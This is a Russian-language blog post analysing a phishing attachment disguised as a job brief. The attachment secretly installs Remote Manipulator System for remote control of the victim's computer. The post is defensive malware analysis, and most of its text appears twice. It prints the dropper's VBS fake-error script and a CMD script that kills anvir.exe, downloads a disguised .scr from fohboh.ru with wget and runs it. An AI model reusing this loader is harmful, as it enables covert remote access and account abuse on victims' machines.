Нежелательный удаленный доступ к компьютеру
Ожидает приглашения
Сегодня знакомая пожаловалась, что примудрилась подхватить вирус, загрузив вложение из полученого на электронную почту письма. Она фрилансер, поэтому архив с названием «Техническое задание.rar» не вызвал у нее подозрения, на расширение файла *.scr в архиве тоже не обратила внимания.
В письме речь шла о предложении работы, правда с кучей ошибок, скорее всего, автор не сильно владеет русским языком.
Файл запустила, ничего не увидела, да и забыла, пока на следующий день не начала получать письма, что с ее адреса рассылаются ссылки на вирусы. Как позже выяснилось, на эти письма с ее почты приходил ответ в стиле: «оййй йййоооооййй и што типер делат то».
Просканировали компьютер антивирусом, нашли какой-то один троян, да и успокоились. Я заново скачал себе тот архив с целью покопаться в нем. Аваст сразу стал ругаться при попытке распаковать архив, нод32 не среагировал. Отключил Аваст, scr переименовал в rar, распаковал, и получил три файла: error.vbs, install.cmd, wget.exe.
Содержимое файла error.vbs:
Содержимое файла stall.cmd:
wget.exe — консольная программа для загрузки файлов по сети.
Здесь все понятно, это только загрузчик, основная часть находится на сайте fohboh.ru
Сайт сам по себе непростой, содержимое сразу на нескольких языках, по адресу fohboh.ru/files находятся три *.scr — файла:
Скачиваю все три, натравливаю туда Аваст, и с немалым удивлением вижу, что он к ним никаких претензий не имеет. Описаным выше способом распаковываю Adobe.Flash.Player.16.0.scr, внутри находится файл system32.msi.
Распаковываю файл через командную строку: msiexec /a c:\system32.msi /qb TARGETDIR=c:\vir.
В папке vir появляется папка program files\Common Files, в ней папки Logs и Printer, а также 15 файлов, среди которых rutserv.exe и rfusclient.exe.
С помощью гугла выясняю, что это Remote Manipulator System — решение для удаленного управления компьютерами, как написано на www.ixbt.com/soft/remote-manipulator.shtml.
Rutserv.exe при запуске показывает: Ваш ID: 446-345-503; ваш пароль: 1576; доступен для соединений.
Rfusclient.exe запускаться отказался, скорее всего из-за того, что находится не в «нужной» папке, хотя кто его знает.
Проверяем пострадавший компьютер, и в папке Program Files\Common Files находятся все те же файлы и папка Printer, а в диспетчере задач — два процесса rfusclient.exe. Папки Logs нету, я так понимаю, неизвестный герой затер ее, причем один из бесплатных анделейтов ее не нашел, а сильнее искать не было особого желания, да и компьютер не мой, чтобы его надолго отбирать. Все файлы удалил, пароли все сменили. Whois говорит что регистратором fohboh.ru является reggi.ru, отправил им письмо, может, и отреагируют.
Разбираться, как именно находят компьютер, к которому можно подключиться, не стал, да и не сильно ориентируюсь, в каком направлении копать.
Вот так вот, все гениальное просто — зачем грузить вирус, который не будет пропущен антивирусом, если можно установить программу для удаленного управления и все сделать своими руками.
В письме речь шла о предложении работы, правда с кучей ошибок, скорее всего, автор не сильно владеет русским языком.
Файл запустила, ничего не увидела, да и забыла, пока на следующий день не начала получать письма, что с ее адреса рассылаются ссылки на вирусы. Как позже выяснилось, на эти письма с ее почты приходил ответ в стиле: «оййй йййоооооййй и што типер делат то».
Просканировали компьютер антивирусом, нашли какой-то один троян, да и успокоились. Я заново скачал себе тот архив с целью покопаться в нем. Аваст сразу стал ругаться при попытке распаковать архив, нод32 не среагировал. Отключил Аваст, scr переименовал в rar, распаковал, и получил три файла: error.vbs, install.cmd, wget.exe.
Содержимое файла error.vbs:
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
i=1
while i>0 or i<0
S.popup "This can only be installed Adobe Flash Player 15.0 on versions Windows designed for the following processor architectures: x64",1111111111, "Error",0+16
i=i-1
wend
Содержимое файла stall.cmd:
@echo off
start error.vbs
start http://adobe.com
@taskkill /f /im anvir.exe
@wget.exe http://fohboh.ru/files/Adobe.Flash.Player.16.0.scr
start Adobe.Flash.Player.16.0.scr
wget.exe — консольная программа для загрузки файлов по сети.
Здесь все понятно, это только загрузчик, основная часть находится на сайте fohboh.ru
Сайт сам по себе непростой, содержимое сразу на нескольких языках, по адресу fohboh.ru/files находятся три *.scr — файла:
- Adobe.Flash.Player.15.0.scr
- Adobe.Flash.Player.16.0.scr
- Adobe.Flash.Player.17.0.scr
Скачиваю все три, натравливаю туда Аваст, и с немалым удивлением вижу, что он к ним никаких претензий не имеет. Описаным выше способом распаковываю Adobe.Flash.Player.16.0.scr, внутри находится файл system32.msi.
Распаковываю файл через командную строку: msiexec /a c:\system32.msi /qb TARGETDIR=c:\vir.
В папке vir появляется папка program files\Common Files, в ней папки Logs и Printer, а также 15 файлов, среди которых rutserv.exe и rfusclient.exe.
С помощью гугла выясняю, что это Remote Manipulator System — решение для удаленного управления компьютерами, как написано на www.ixbt.com/soft/remote-manipulator.shtml.
Rutserv.exe при запуске показывает: Ваш ID: 446-345-503; ваш пароль: 1576; доступен для соединений.
Rfusclient.exe запускаться отказался, скорее всего из-за того, что находится не в «нужной» папке, хотя кто его знает.
Проверяем пострадавший компьютер, и в папке Program Files\Common Files находятся все те же файлы и папка Printer, а в диспетчере задач — два процесса rfusclient.exe. Папки Logs нету, я так понимаю, неизвестный герой затер ее, причем один из бесплатных анделейтов ее не нашел, а сильнее искать не было особого желания, да и компьютер не мой, чтобы его надолго отбирать. Все файлы удалил, пароли все сменили. Whois говорит что регистратором fohboh.ru является reggi.ru, отправил им письмо, может, и отреагируют.
Разбираться, как именно находят компьютер, к которому можно подключиться, не стал, да и не сильно ориентируюсь, в каком направлении копать.
Вот так вот, все гениальное просто — зачем грузить вирус, который не будет пропущен антивирусом, если можно установить программу для удаленного управления и все сделать своими руками.